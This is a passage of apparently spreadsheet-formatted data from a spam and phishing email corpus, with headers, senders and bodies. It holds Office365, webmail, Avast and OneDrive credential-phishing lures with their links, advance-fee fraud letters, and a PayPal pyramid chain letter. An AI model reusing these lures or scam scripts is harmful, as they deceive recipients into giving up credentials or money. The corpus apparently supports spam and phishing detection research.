*[class*="mobile-shown"], *[class*="mobile-shown"] div { display: block !important; overflow: visible !important; width: auto !important; max-height:inherit !important; height:auto !important; visibility: visible !important;} *[class*="photo"] img { width:100% !important; height:auto !important;} *[class*="photo80"] img { width:80% !important; height:auto !important;} *[class*="photo50"] img { width:50% !important; height:auto !important;} *[class*="photo35"] img { width:35% !important; height:auto !important;} *[class*="buttonblck"] table { width:auto !important; } *[class*="mobile-center"] table, *[class*="mobile-center"], *[class*="mobile-center"] img { text-align: center !important; margin: 0 auto !important; } *[class*="mobile-left"] table, *[class*="mobile-left"], *[class*="mobile-left"] img { text-align: left !important; } *[class*="mobile-no-padding"] { padding:0px !important; } *[class*="mobile-no-side-padding"] { padding-left:0px !important; padding-right:0px !important; } *[class*="mobile-no-top-padding"] { padding-top:0px !important; } *[class*="mobile-side-padding-10"] { padding-left:10px !important; padding-right:10px !important; } *[class*="mobile-side-padding-15"] { padding-left:15px !important; padding-right:15px !important; } *[class*="mobile-side-padding-20"] { padding-left:20px !important; padding-right:20px !important; } *[class*="mobile-side-padding-25"] { padding-left:25px !important; padding-right:25px !important; } *[class*="mobile-side-padding-30"] { padding-left:30px !important; padding-right:30px !important; } *[class*="mobile-side-padding-35"] { padding-left:35px !important; padding-right:35px !important; } *[class*="mobile-side-padding-40"] { padding-left:40px !important; padding-right:40px !important; } *[class*="mobile-side-padding-45"] { padding-left:45px !important; padding-right:45px !important; } *[class*="mobile-side-padding-50"] { padding-left:50px !important; padding-right:50px !important; } *[class*="mobile-left-padding-20"] { padding-left:20px !important; } *[class*="mobile-top-padding-10"] { padding-top:10px !important; } *[class*="mobile-top-padding-20"] { padding-top:20px !important; } *[class*="mobile-top-padding-30"] { padding-top:30px !important; } *[class*="mobile-top-padding-40"] { padding-top:40px !important; } *[class*="mobile-bottom-padding-40"] { padding-bottom:40px !important; } *[class*="mobile-bottom-padding-20"] { padding-bottom:20px !important; } *[class*="mobile-bottom-padding-10"] { padding-bottom:10px !important; } *[class*="mobile-bottom-padding-0"] { padding-bottom:0px !important; } *[class*="mobile-font-56"] { font-size: 56px !important; line-height: 61px !important; } *[class*="mobile-font-40"] { font-size: 40px !important; line-height: 45px !important; } *[class*="mobile-font-37"] { font-size:37px !important; line-height:47px !important; } }   @media only screen and (max-width:497px) { }       Office365 rejected your incoming messages to the following email addresses:                              	                 Microsoft rejected your incoming messages to the following email addresses:   jose@monkey.org (jose@monkey.org) Your two incoming mails were placed on pending delivery because the sender failed our security detection checks..     To keep you safe, we required an extra security challenge. Click verify your e-mail below to confirm that the recent activity was yours and to regain access with your email delivery transmission.     Verify your e-mail     After verifying your e-mail, the lock on this mailbox will be released automatically.   We appreciate your cooperation and look forward to continuing to improve the security of your microsoft account.                                          Learn how to format a Word document.         Watch the video  	  	         Make Excel workbooks, charts, and tables.         Watch the video  	  	         Create mind-blowing presentations.         Watch the video                        Account Summary              User ID: jose@monkey.org                                     	      	 	 	             You are receiving this email because you have subscribed to Microsoft Office 365.         Microsoft Corporation    One Microsoft Way    Redmond, WA    98052 USA    Copyright 2017 Microsoft Corporation    Privacy Statement | Unsubscribe  	  Use free training to do more with Office 365 Office365 rejected your incoming messages to the following email addresses:          Microsoft rejected your incoming messages to the following email addresses: jose@monkey.org (jose@monkey.org)Your two incoming mails were placed on pending delivery because the sender failed our security detection checks..   To keep you safe, we required an extra security challenge. Click verify your e-mail below to confirm that the recent activity was yours and to regain access with your email delivery transmission.   Verify your e-mail   After verifying your e-mail, the lock on this mailbox will be released automatically. We appreciate your cooperation and look forward to continuing to improve the security of your microsoft account.     Learn how to format a Word document.  Watch the video    Make Excel workbooks, charts, and tables.  Watch the video    Create mind-blowing presentations.  Watch the video     Account Summary  User ID: jose@monkey.org    You are receiving this email because you have subscribed to Microsoft Office 365.  Microsoft Corporation  One Microsoft Way  Redmond, WA  98052 USA  Copyright 2017 Microsoft Corporation  Privacy Statement | Unsubscribe</t>
  </si>
  <si>
    <t>http://image.email.office.com</t>
  </si>
  <si>
    <t>CHL</t>
  </si>
  <si>
    <t>131</t>
  </si>
  <si>
    <t>To: &lt;009@vh31.0fees.us&gt;\nFrom: Admin Support &lt;009@vh31.0fees.us&gt;\nDate: Tue, 23 Feb 2016 19:30:38 +0530</t>
  </si>
  <si>
    <t>Tue, 23 Feb 2016 19:30:38 +0530</t>
  </si>
  <si>
    <t>Admin Support &lt;009@vh31.0fees.us&gt;</t>
  </si>
  <si>
    <t>&lt;009@vh31.0fees.us&gt;</t>
  </si>
  <si>
    <t>Alert!</t>
  </si>
  <si>
    <t>Dear User,\n\nThis is to inform you that on 22 February 2016, we updated our webmail display framework with the all new Display and Network EPM. We’ve temporarily limited what you can do with your email account as you are still using the old server. Update your email to gain full access to all the newly improved email features.\n\nClick on the link below to initiate the update process: \n[URL]http://systemuqdatepanelpad0011.s0host.net[/URL]\n\nThis is an automated email – Please do not reply.\nThis mailbox is not monitored and you will not receive a response.\n--------------------------\n©Admin Support.\n\n</t>
  </si>
  <si>
    <t>http://systemuqdatepanelpad0011.s0host.net</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Avast AntiVirus &lt;ops.kpa@intralineshipping.com&gt;\nDate: Tue, 23 Aug 2016 20:57:51 +0100</t>
  </si>
  <si>
    <t>Tue, 23 Aug 2016 20:57:51 +0100</t>
  </si>
  <si>
    <t>Avast AntiVirus &lt;ops.kpa@intralineshipping.com&gt;</t>
  </si>
  <si>
    <t>AVAST SECURITY ALERT</t>
  </si>
  <si>
    <t>WARNING!!!  Dear jose@monkey.org  Your mailbox has been been infected with a deadly virus.  This can cause total email shutdown or data loss.  To stay secured, you must run an email scan now,  else your mailbox will crash soon.        Scan Mailbox Now            	 	 Safe Mail: This email has been checked for viruses by Avast antivirus software.  [URL]http://jmagalhaes.com[/URL]"&gt;[URL]www.avast.com[/URL]  WARNING!!! Dear jose@monkey.org  Your mailbox has been been infected with a deadly virus. This can cause total email shutdown or data loss. To stay secured, you must run an email scan now, else your mailbox will crash soon.  Scan Mailbox Now    Safe Mail: This email has been checked for viruses by Avast antivirus software. [URL]http://jmagalhaes.com[/URL]"&gt;[URL]www.avast.com[/URL]</t>
  </si>
  <si>
    <t>http://jmagalhaes.com www.avast.com http://jmagalhaes.com www.avast.com</t>
  </si>
  <si>
    <t>PRT</t>
  </si>
  <si>
    <t>4736</t>
  </si>
  <si>
    <t>To: "yyyy@netnoteinc.com" &lt;yyyy@netnoteinc.com&gt;\nFrom: "Joke-of-the-Day!" &lt;reply-56446664-3@william.monsterjoke.com&gt;\nDate: Tue, 23 Apr 2002 02:09:43 UT</t>
  </si>
  <si>
    <t>Tue, 23 Apr 2002 02:09:43 UT</t>
  </si>
  <si>
    <t>"Joke-of-the-Day!" &lt;reply-56446664-3@william.monsterjoke.com&gt;</t>
  </si>
  <si>
    <t>"yyyy@netnoteinc.com" &lt;yyyy@netnoteinc.com&gt;</t>
  </si>
  <si>
    <t>Is Neotropin right for you?</t>
  </si>
  <si>
    <t>![]([URL]http://www.vitafactory.com[/URL]\n\n* * *\n\n![]([URL]http://www.vitafactory.com[/URL]\n\n* * *\n\n  \n![]([URL]http://www.vitafactory.com[/URL]\n\n* * *\n\n![]([URL]http://www.vitafactory.com[/URL]\n\n* * *\n\n  \n**Unsubscribe:**  \nPlease send a blank mail to:  \nunsub-56446664-3@william.monsterjoke.com  \n  \n![]([URL]http://www.vitafactory.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.vitafactory.com http://www.vitafactory.com http://www.vitafactory.com http://www.vitafactory.com http://www.vitafactory.com</t>
  </si>
  <si>
    <t>1109</t>
  </si>
  <si>
    <t>To: Recipients &lt;info@maffeihoh.com&gt;\nFrom: "Mr. Ben Powell, CFO" &lt;info@maffeihoh.com&gt;\nDate: Tue, 22 Oct 2019 10:15:23 -0400</t>
  </si>
  <si>
    <t>Tue, 22 Oct 2019 10:15:23 -0400</t>
  </si>
  <si>
    <t>"Mr. Ben Powell, CFO" &lt;info@maffeihoh.com&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;info@maffeihoh.com&gt;</t>
  </si>
  <si>
    <t>A document shared on OneDrive.</t>
  </si>
  <si>
    <t>Hello,  An official document has been shared with you through OneDrive.  Access the document below on OneDrive.          OneDrive             Free online storage for your files. Check it out.   Get the OneDrive mobile app. Microsoft respects your privacy. To learn more, please read our Privacy Statement. Microsoft Corporation, One Microsoft Way, Redmond, WA, 98052 --- This email has been checked for viruses by Avast antivirus software. [URL]https://www.avast.com[/URL] Hello, An official document has been shared with you through OneDrive. Access the document below on OneDrive.   OneDrive Free online storage for your files. Check it out. Get the OneDrive mobile app.Microsoft respects your privacy. To learn more, please read our Privacy Statement. Microsoft Corporation, One Microsoft Way, Redmond, WA, 98052 Virus-free. [URL]www.avast.com[/URL]</t>
  </si>
  <si>
    <t>3091</t>
  </si>
  <si>
    <t>To: nan\nFrom: evansonumba16@tiscali.co.uk &lt;evansonumba16@tiscali.co.uk&gt;\nDate: Tue, 22 May 2007 17:08:37 +0100</t>
  </si>
  <si>
    <t>Tue, 22 May 2007 17:08:37 +0100</t>
  </si>
  <si>
    <t>evansonumba16@tiscali.co.uk &lt;evansonumba16@tiscali.co.uk&gt;</t>
  </si>
  <si>
    <t>Hello Dearest Friend,</t>
  </si>
  <si>
    <t>Hello Dearest Friend, \n\nI am glad to inform you that I have successfully concluded the \ntransaction,the money has been transferred to London through the \nassistant of Mr.Howard Ferraro who is a London base business man.\n\nCurrently I am in London with him and my wife and children. However, I \ndid not forget you because you are the source of my success,you made me \nwhat I am now though you are not there to complete this project with me \nbut I gave all the credit and thanks to you. I know it is not your \nfault or rather your wish to back off on me and the transaction ,I \nunderstand it was simply because of some circumstances you could not \ncontrol. \n\nIn appreciate of your assistance I have mapped out as a Compensation \nand wrote on your favor a certified bank cheque worth of US$800,000.00.\n(Eight Hundred Thousand, United States Dollar Only) I left the cheque \nwith my Secretary Mr.Mr.Jack David  on my departure to London. I would \nlike you to contact him yon the below info and instruct him where to \nsend the cheque to because i have directed him on that already. \n\nAttn: Mr Jack David \nEmail:jackdavid_42@yahoo.fr  \nCell Phone:+22993478739\n\nAs soon as you recieve the cheque you let me know because i am busy \nhere trying to put things together and may not be chanced to email you \nfrequently.Feel free to contact him for your cheque.I will stop here.\n\nOnce again,thank you very much and remain blessed. \n\nRegards,\nDr Evans Onumba\n\n\n\n\n\n\n\n\n\n___________________________________________________________\n\nTiscali Broadband only £9.99 a month for your first 3 months! [URL]http://www.tiscali.co.uk[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.tiscali.co.uk</t>
  </si>
  <si>
    <t>266</t>
  </si>
  <si>
    <t>To: Rrrrr &lt;R@E&gt;\nFrom: Wells Fargo Accounting &lt;wfba.accounting@wellsfargo.com&gt;\nDate: Tue, 22 Jul 2003 00:08:18 +0000</t>
  </si>
  <si>
    <t>Tue, 22 Jul 2003 00:08:18 +0000</t>
  </si>
  <si>
    <t>Wells Fargo Accounting &lt;wfba.accounting@wellsfargo.com&gt;</t>
  </si>
  <si>
    <t>Rrrrr &lt;R@E&gt;</t>
  </si>
  <si>
    <t>Re: Wells Fargo Bank New Business Account Application - ID# 4489</t>
  </si>
  <si>
    <t>WARNING: This e-mail has been altered by MIMEDefang.  Following this paragraph are indications of the actual changes made.  For more information about your site's MIMEDefang policy, contact Departmental Computing Organization .  For more information about MIMEDefang, see:             [URL]http://www.roaringpenguin.com[/URL] An attachment named wellsfargo.biz.jsessionid=5QWBU8TLSM01.pif was removed from this document as it constituted a security hazard.  If you require this document, please contact the sender and arrange an alternate means of receiving it.</t>
  </si>
  <si>
    <t>http://www.roaringpenguin.com</t>
  </si>
  <si>
    <t>2722</t>
  </si>
  <si>
    <t>To: nan\nFrom: britt benson &lt;c27ben@hotmail.fr&gt;\nDate: Tue, 21 Nov 2006 15:07:09 +0000</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2006 15:07:09 +0000</t>
  </si>
  <si>
    <t>britt benson &lt;c27ben@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>from britt benson.</t>
  </si>
  <si>
    <t>from britt benson.\n22 years old boy\nAbidjan -Cote d.Ivoire\nEMAIL (britt_benson2@yahoo.fr)\n\nDear,\n\nIt is my pleasure to contact you for a business\nventure which I intend to establish in your\ncountry. Though I have not met with you before but I\nbelieve, one has to risk confiding in someone to\nsucceed sometimes in life. There is this amount of\n$6.Million United States Dollar.\nwhich my late father deposited  with\na bank here in Abidjan Capital city of Cote D'Ivoire\nwhich he wanted to used for his political\nreason in our Country before he was assassinated.\n\nNow I have decided to invest these money\nin your country or any  where safe enough outside Africa\nfor security and political reasons. i want  you to send\nme your bank detals were this fund will be transferd\ninto so that as soon as the money gets to your acount i\nwill be coming over to your country to finish my\neducation and also the investment of the money while\nyou will be the maneger of the investment ontill i\nfinish my education,\nI will like to invest  part of the money into these\nthree investment\nin your Country but, if there is any other business\nthat is better than what I am suggestion, I will be\nvery glad to follow your advice.\n1). Real estate\n2). The transport industry\n3). Five star hotel\n\nIf you can be of an assistance to me i will be\npleased to offer you 20%  Of the total fund while\nthe balance will be invested by you.\nI await your soonest response,please reply with this \nadress,(britt_benson2@yahoo.fr)\n\nRespectfully yours,\n\nbritt benson\n\n_________________________________________________________________\nTen : profite de ton Messenger en illimité sur ton mobile !  \n[URL]http://mobile.live.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2721</t>
  </si>
  <si>
    <t>To: nan\nFrom: alain konan &lt;kkalain011@hotmail.com&gt;\nDate: Tue, 21 Nov 2006 03:25:50 +0100</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2006 03:25:50 +0100</t>
  </si>
  <si>
    <t>alain konan &lt;kkalain011@hotmail.com&gt;</t>
  </si>
  <si>
    <t>SUPPLY FROM MR KONAN ALAIN</t>
  </si>
  <si>
    <t>SUPPLY FROM MR KONAN ALAIN\n\nAbidjan.Cote d'Ivoire.\n\nAttn:The President\n\nDear Sir,\n\nI write to solicite your assistance and support to enable me execute a  very \nlucrative and high profiting business transaction.I am very  sure that with \ntrust and understanding,we will be able to execute this busines to our \nmutual benefit and believe that you will not let down the  trust I am \nwilling to repose in you.\n\nI work for an Ivorien based import and export firm ("a-MIC"), I work product \nsourcing manager. Between the 17th -19th of may, 2002 a  business seminar \nwas held in BOUAKE Cote Divoire  of which I attended.While in the Seminar, I \nwas opportuned to meet ALHAJI NURUDEEN ALI MAHMOUD ,the President of \nALI-MAHMOUD DAIRY &amp; CATTLE FARMS ETS. ALHAJI NURUDEEN ALI MAHMOUD isan \naccomplished and widely known and recognised millionaire farmer in this part \nof the region. He has cattle farms in different  countries. Above all, he is \none of the greatest supplier  of cattle,beef and other diary products in \nthis part of the coast.On getting to know my proffesion, ALHAJI NURUDEEN ALI \nMAHMOUD took me into confidence by informing me about the purchase of a \nparticular but very  important medicine for his cattle. He informed me that \nhe buys this  product at $5,000.00 USD per carton, and that he mostly buys \nto the excess  of 450 cartons. He informed me that he would like me to find \nout if my organisation could source for him a cheaper supplier considering \nthe  recent trend of falls in the general price of beef in the world market  \nwhich is affecting his business.\n\nBack in my office, I discussed this proposal with my boss and he  decided to \nhandle the  supply by himself.We carried out a market research and  \ndiscovered that we could purchase this medicine somewhere cheaper in EUROPE \nfor $2,000.00 USD per carton . We moved a proposal to ALI-MAHMOUD DAIRY &amp; \nCATTLE FARMS ETS. to make the supply to them at $4,800.00 USD per carton of \nwhich  he accepted. Owing to my role in the transaction, I had an agreement \nwith my  director to be receiving 15% of whatever gain is made on each \nsupply of which he agreed. But on the completion of the suply and the \nreceipt of the payment, my boss renegated on our agreement and refused to \ngive me my  share of the profit. Since then our relationship has been at its \nlowest  ebb. I have since accepted it as one of life experiences.\n\nHowever, as God would have it, recently, I ran into ALHAJI NURUDEEN ALI \nMAHMOUD and he informed me that he would want us to urgently supply him  \nwith 1250 cartons of the same product before the end of Dec 2006.I  used the \noppurtunity to inform Alhaji that I can  introduce him to the main producer \nof this vaccine who can supply him  the product at $4,400.00 USD if he will \npay in advance as he usually  does. He was very pleased and has assured me \nthat he is not going to contact my boss again for this vaccine. He is  now \nwaiting for me to link him to the producer of\nthe vaccine. We will buy the medicine at $2,000.00 USD from EUROPE and sell \nat  $4,400.00 USD TO ALHAJI NURUDEEN ALI MAHMOUD,with him making a down \npayment of  50% of our quoted price first.\n\nIf you are interested and capable of handling this supplies on my \nbehalf,kindly get back to me urgently through my e-mail,so that we can agree \non the terms and profit sharing,after which I can then furnish you with the \ncontacts of both our source in EUROPE and that of ALHAJI NURUDEEN ALI \nMAHMOUD . Kindly be notified that at no point in time should you let  ALHAJI \nNURUDEEN ALI MAHMOUD know that you are not the producer of the medicine and \nwe  should never allow him to know the\ncontact of our real source in EUROPE  so that he would'nt bypass us to deal \ndirectly with them.\n\nThanks for your cooperation.\nYours sincerely,\n\nMR KONAN ALAIN\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>4934</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: hetfTurn $5 into $20k Pay Pal &lt;itcolarryspaypal@yahoo.com&gt;\nDate: Tue, 21 May 2002 21:14:02 -0400</t>
  </si>
  <si>
    <t>Tue, 21 May 2002 21:14:02 -0400</t>
  </si>
  <si>
    <t>hetfTurn $5 into $20k Pay Pal &lt;itcolarryspaypal@yahoo.com&gt;</t>
  </si>
  <si>
    <t>Turn $5 into $20k- ( Pay Pal ) vdbs</t>
  </si>
  <si>
    <t>THIS E-MAIL AD IS BEING SENT IN FULL COMPLIANCE WITH U.S. SENATE BILL 1618, TITLE #3, SECTION 301\n\nTO REMOVE YOURSELF SEND A BLANK E-MAIL TO:removal992002@yahoo.com\n\nHi,\n\nYou most likely have seen or heard about \n"The Letter" $5.00 Paypal Program" that has been seen lately \non 20/20 and OPRAH WINFREY...etc... How would you like \nto generate more income through a different avenue? What \nif it took only an hour to set it up? Even if you are already in another \nprogram, stay with it, but do yourself a favor and DO THIS ONE as well. \nThere \nis NO LIMIT to the income you can generate from this business!!\n\nTHE FACTS ARE SIMPLE;- IF YOU NEED TO MAKE A FEW\nTHOUSAND DOLLARS REALLY FAST, THEN THIS PROGRAM I'M GOING TO SHARE WITH \nYOU \nIS THE WAY TO DO IT! IT'S THE FASTEST, EASIEST PROGRAM YOU WILL EVER DO!!!\n\nHere's something which (I trust) will be of interest\nto you! Please read all of this. This is not something \nthat I would normally look at, except that I read an \narticle in the Wall Street Journal on 6/16/2001 about \nPayPal and, when I came across this concept I knew it \nwould work because, as a member of Pay Pal, I had\nalready experienced their efficiency and good standing. \nYou can complete this whole process in one hour and you \nwill never forget the day you decided to do so!!! Oh! \nDid I say FAST? By fast I mean 'the speed of the \nInternet-type fast.' Everything is done on the\nInternet by E-mail.\n\nNEED PROOF? Here are just two testimonials from\nindividuals who decided to invest nothing more than a \nlittle of their time.\n\nTESTIMONIALS FROM:\n\nTony Stevens, Vandenberg AFB, CA:\nHey! I got your e-mail! YOU ROCK! I sent it to all of\nour frat brothers.....and while I haven't seen my $20 \ngrand yet, I'm up to $8,285. Hook me up when you run \nthis program again........\n\nMary Gathers, Columbia, SC:\nHey cuz! This is Mary. I only have one thing to say to\nyou... OH MY GOD! I sent 20 e-mail's out like you said \nand went on vacation. When I got back, my account was \nup to over $12,000! I owe you!\n\nGETTING STARTED.\n\nIf you're not already a user, the very first thing you\nneed to do is go to PayPal and sign up. It takes two minutes \nand PayPal will deposit $5.00 in your account. That makes this \nprogram FREE!\n\nHere's the link:\n\n[URL]https://www.paypal.com[/URL]\n\nBE SURE TO SIGN UP FOR A PREMIER (FREE) ACCOUNT! OR YOU'LL BE LIMITED TO \n$100 \nDOLLARS ONLY!!! YOU WILL MAKE MUCH MORE THAN THIS!!!\n\nThen...... E-mail $5.00 from your PayPal account ($5.00 free) \nto the FIRST name on the list (No.1) along with a little note\nlike "Please add me to your mailing list." BE PREPARED TO GET\nEXCITED.... YOU \nWON'T BE DISAPPOINTED!!! Don't laugh! Try this while you wait for the \nothers \nto start working. One hour of work to get started - no mailing lists. No \nprinting, copying or waiting and the concept is 100% legal (refer to US \nPostal and \nLottery Laws, Title 18, Section 1302 and 1341, or Title 18, \nSection 3005 in the US code, also in the code of Federal \nRegulations, Volume 16, Sections 255 and 436, which state a \nproduct or service must be exchanged for money received). \n\nHere's How It Works. Unlike many other programs, this \nTHREE LEVEL PROGRAM is more realistic and much, much\nfaster. Because it is so easy, the response rate is VERY \nHIGH, VERY FAST-Internet E-mail FAST-and you will see \nresults in just two weeks or less! JUST IN TIME FOR NEXT \nMONTHS BILLS! You need only mail out 20 copies (not 200 \nor more as in other programs). Ideally, you should\nsend them to people who send their programs to you or to \npersonal contacts who are already working on the web, \nbecause they know these programs work and they are already \nbelievers in the system! Besides, this program is \nMUCH, MUCH FASTER and has a HIGHER RESPONSE RATE! Even if you are already \nin \nanother program, stay with it, but do\nyourself a favor and DO THIS ONE as well. START RIGHT NOW! \n\nIt's simple and will only cost $5.00 max. It will pay off long \nbefore others even begin to receive letters! Just give ONE \nperson a $5.00 gift (REMEMBER THOUGH, this $5.00 is the $5.00 YOU GET \nWHEN \nYOU SIGN UP FOR YOUR new PayPal account). That's all! If you already have \na \nPayPal account and do not receive the $5.00, feel free to donate a $5.00 \nGIFT \nto\nthe person in the No.1 spot and add your name on the list \nat No.3 position having moved up the remaining two. Follow \nthe simple instructions and in two weeks you will have $20,000 \nin your bank account!\n\nBecause of the VIRTUALLY ZERO INVESTMENT, SPEED and HIGH PROFIT \nPOTENTIAL, \nthis program has a VERY HIGH RESPONSE RATE! All from just one $5.00 \ntransaction that you get from PayPal!!!\n\nFollow These Simple Instructions: \n\nE-mail the $5.00 from your Paypal account to the FIRST \nname on the list (No.1) along with a note saying \n"subscribe me to your mailing list". Only the first \nperson on the list gets your name and $5.00 gift. \n\nEdit the list, removing the FIRST (No.1) NAME FROM THE LIST. Move the \nother \ntwo names UP and ADD YOUR NAME. Don't try to add your name in the first \nplace \nin order to earn money fast! \nIf you do that, you will ONLY reach people you send e-\nmail to then your name will be immediately removed\nfrom the No.1 place and you can't reach more people! But if \nyou add your name on the No.3 place, there will be tons of \npeople receiving e-mail's later and when your name is No.1!!! \n\nNOTE: Do not forget to replace the PayPal referring URL in \nthe body of the letter with your own PayPal referring URL. \nSend out 20 copies (minimum) of this letter.\n\nALSO NOTE: By sending this letter and the payment via E-MAIL, the \nresponse \ntime is much faster... ELECTRONIC TRANSFER INTERNET FAST! \n\nConsider this! Millions of people surf the Internet\neveryday, all day, all over the world! Here are the 3 people \nto start with. Sign up, send $5.00 to the first person, move \nthe other two up to Nos 1 &amp; 2 respectively and add your own \ne-mail address at No.3. Be sure to use your email address that is \nassociated \nwith your PayPal account.\n\n*************************************\n\n1.  csreddy3@rediffmail.com\n\n2.  tomk4@prodigy.net\n\n3.  larryspaypal@yahoo.com \n\n*************************************\n\nThere are fifty thousand new people who get on the\nInternet every month! An excellent source ofemail addresses \nis the people who send you offers by email.\nThe source is UNLIMITED! It boggles my mind to\nthink of all the possibilities! Mail, or should I \nsay 'E-mail', your letter and payment TODAY! It's \nso easy. One hour of your time, THAT'S IT!\nTo send your letter by e-mail, copy this ENTIRE PAGE\nand paste it in the message of your E-mail. \n\nTO DO THIS:\n1. Go in your toolbar to "edit" and "select all"\n2. Go in your toolbar to "edit" and select "copy"\n3. Start (compose) a new E-mail message (make sure\nit's PLAIN TEXT so everyone can view it!)\n4. Fill in your Address and Subject Box\n5. Go to "edit" and "paste" (Then you can format it\nanyway you want!)\n\n\nNow you can edit the addresses with ease. Delete the\ntop name, adding your name and address to the bottom \nof the list, then simply changing the numbers. Remember, \nYOUR NAME goes on the BOTTOM and the other 2 names move up. But DO NOT \nforget \nto send $5.00 via PayPal (along \nwith your note) to the position #1 - TOP E-MAIL\naddress before deleting it!\n\nNOTE: Be sure to replace the PayPal referring URL in\nthis e-mail of the letter with your own PayPal \nreferring URL;\n\n\n[URL]https://www.paypal.com[/URL]\n\n\nTHERE'S NOTHING MORE TO DO.\nWhen your name reaches the first position in a few\ndays, it will be your turn to collect your MONEY!\nThe money will be sent to you by 2,000 to 4,000 people\nlike yourself, who are willing to invest one hour to \nreceive $20,000 in cash! That's all! There will be a \ntotal of $20,000 in $5.00 bills in your mailbox (account) \nin two weeks. $20,000 for one hour's work! This is \nreal money that you can spend on anything you wish!\nJust deposit it to your own bank account or spend it \ndirectly from your PayPal account!!! It's just that \neasy!!! I think it's WORTH IT, don't you?\n\nGO AHEAD--- TRY IT!!! EVEN IF YOU MAKE JUST 3 OR 4\nTHOUSAND, WOULDN'T THAT BE NICE?\n\nIF YOU TRY IT, IT WILL PAY! CAN YOU DO IT AGAIN? OF\nCOURSE YOU CAN---\n\nThis plan is structured for everyone to send only 20\nletters each. However, you are certainly not limited \nto 20. Mail out as many as you want. Every 20 letters \nyou send has a return of $20,000 or more. If you can \nE-MAIL forty, sixty, eighty, or whatever, GO FOR IT! \nTHE MORE YOU PUT INTO IT THE MORE YOU GET OUT OF IT! Each time you run \nthis \nprogram, just follow steps 1\nthrough 3 and everyone on your gift list benefits! \nSimple enough? You bet it is! Besides, there are no \nmailing lists to buy (and wait for), and trips to the \nprinter or copier, and you can do it again and again \nwith your regular groups or gift givers, or start up \na new group. Be SURE and PAY the first person on the \nlist. This is proof that you paid to get put on the \nlist which is the service rendered to make all this \nlegal!!! Why not? It's working! Each time you receive \nan MLM offer, respond with this letter! Your name will \nclimb to the number one position at dizzying rates. \nFollow the simple instructions, and above all, PLEASE \nPLAY FAIR. That's the key to this program's success. \nYour name must run the full gamut on the list to produce \nthe end results. Sneaking your name higher up on the list \nWILL NOT produce the results you think, and it only cheats \nthe other people who have worked hard and have earned the \nright to be there. So please, play by the rules and the \n$$$ will come to you!\n$$$ E-MAIL YOUR LETTERS OUT TODAY! Together we will \nprosper! $$$ You are probably skeptical of this, \nespecially with all the different programs out there \non the web, but if you don't try this you will \nnever know. That's the way I felt. I'm glad I did it!\nI've been watching this type of program for years and\nthis is about as easy and fast as you can get it and \nit can even be free to try now with Pay Pal, no stamps, \nno envelopes, no copies to be made - just a little effort \nand faith!!! This program really "Keeps It Short and Simple"! \n\nOH BY THE WAY....each time someone signs up with your link \nunder your name... you also make $5.00 from PayPal...\nso they pay to open up the account but they also pay you when \nsomeone signs up from being referred by you. AWESOME! \nLet's all make some serious money \n$$$$$$\n\nCLICK HERE TO BEGIN:\n\n[URL]https://www.paypal.com[/URL]\n\nPlay by the rules, this doesn't cost anything but your\ntime, and if everyone plays fair everyone WINS.\n\n\nFOLLOWING ARE SOME NOTES ABOUT PayPal WHICH YOU MAY FIND HELPFUL:PayPal \nlets \nyou pay anyone with an e-mail address and is the world's No.1 online \npayment \nservice - it's accepted on over 3 million eBay T auctions and thousands \nand \nthousands of online shops. You can also use PayPal to \npay your friends - example; it's a convenient way to \nsplit the phone bill with your roommate, send cash to your kids in \ncollege,or \nsend cash to someone in another country. Better yet, you can also \nearn $5 while you do it. Each time someone signs up for an account and \ncompletes the Refer-a-Friend requirements, we'll give you a $5 BONUS! \nWhen \nyou send money through Pay Pal, you can fund your payments with your \ncredit \ncard or checking account. You won't have to worry about your privacy, \nbecause \nPayPal keeps your accounting information safe. Making a purchase with \nPayPal \nis more secure than mailing a check or giving your credit card number to \na \nstranger. That's why over 9 million people from around the world use \nPayPal \nto move money.\nSigning up for a PayPal account is easy. It takes only\na couple of minutes and, if you complete the bonus \nrequirements PayPal will automatically add $5 to your \naccount balance. To learn more about PayPal visit the \nweb site at\n\n[URL]https://www.paypal.com[/URL]\n\n"Best of the Web" -Forbes\n"Using the service is actually safer than a check or\nmoney order"- Wall Street Journal\n\n\n"PayPal can play a major role in your life. You can\nuse it to pay for stuff at auction sites, settle \ndinner debts with friends or nudge your cousin to \nrepay that $50 he borrowed at the family reunion.- Time\n\n\nPS. Does this sound too good? Well maybe to some skeptics it\nis. But it actually works, and is worth \nthe few minutes of your time now. \nP.S.S. If You Decide to Join in on this Venture Please Return a blank \nemail \nto the last email address on the list (#3) with "Thanks, I'll Join" in\nthe \nsubject line. This Helps everyone keep track of their progress. You Will \nNot \nbe added to My Email List\n\n\n\nofsknxxdqgtgqvsoiytkivajvtj</t>
  </si>
  <si>
    <t>https://www.paypal.com https://www.paypal.com https://www.paypal.com https://www.paypal.com</t>
  </si>
  <si>
    <t>4932</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "American Financial" &lt;amfin@insurancemail.net&gt;\nDate: Tue, 21 May 2002 19:06:50 -0400</t>
  </si>
  <si>
    <t>Tue, 21 May 2002 19:06:50 -0400</t>
  </si>
  <si>
    <t>"American Financial" &lt;amfin@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Feel The Power!</t>
  </si>
  <si>
